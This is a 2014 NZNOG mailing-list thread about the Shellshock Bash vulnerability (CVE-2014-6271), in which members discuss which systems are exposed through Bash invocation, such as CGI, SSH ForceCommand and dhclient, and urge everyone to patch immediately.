No, it's not only for bash cgi scripts - it's for anything that results in Bash being called.

For example, a Perl CGI script that calls system(). Or another binary that executes anything via bash.

Or an SSH server configured to use the "ForceCommand" option (eg, to put the user into a captive menu rather than a shell).�� Or a dhcp client running��dhclient-script.

There's dozens of potential vectors to abuse this one - many of which haven't even been thought of yet.�� Patch *now*, on all machines - regardless of whether they have a webserver or not.

�� Scott

On Sat, Sep 27, 2014 at 10:45 AM, Eliezer Croitoru <eliezer@ngtech.co.il> wrote:

Isn't this issue only for bash cgi-scripts?
And how exactly httpd and others set the environmental variables? aren't they escaping the strings into literal ones? which.. will just disable any bash related issues?

Eliezer

On 09/25/2014 01:57 AM, Dean Pemberton wrote:

Hi all,
This isn't normally a security vuln release list but this one looks pretty bad

A newly discovered vulnerability (CVE-2014-6271) in the Bash
command-line interpreter poses a critical security risk to Unix and
Linux systems.�� It allows remote code execution.

NZITF is responding to this remote execution exploit, with a News page
that we will be keeping up to date - http://www.nzitf.org.nz/news.html
.

We are also reaching out to technical and security community points of
contact to raise awareness to the issue and ensure necessary action is
taken (hence this email to you).�� Please note,�� no patch is yet
available for Mac OSX.�� However, many other patches are available.

So Patch, Patch, Patch.

Regards,
Dea
_______________________________________________
NZNOG mailing list
NZNOG@list.waikato.ac.nz
http://list.waikato.ac.nz/mailman/listinfo/nznog

_______________________________________________
NZNOG mailing list
NZNOG@list.waikato.ac.nz
http://list.waikato.ac.nz/mailman/listinfo/nznog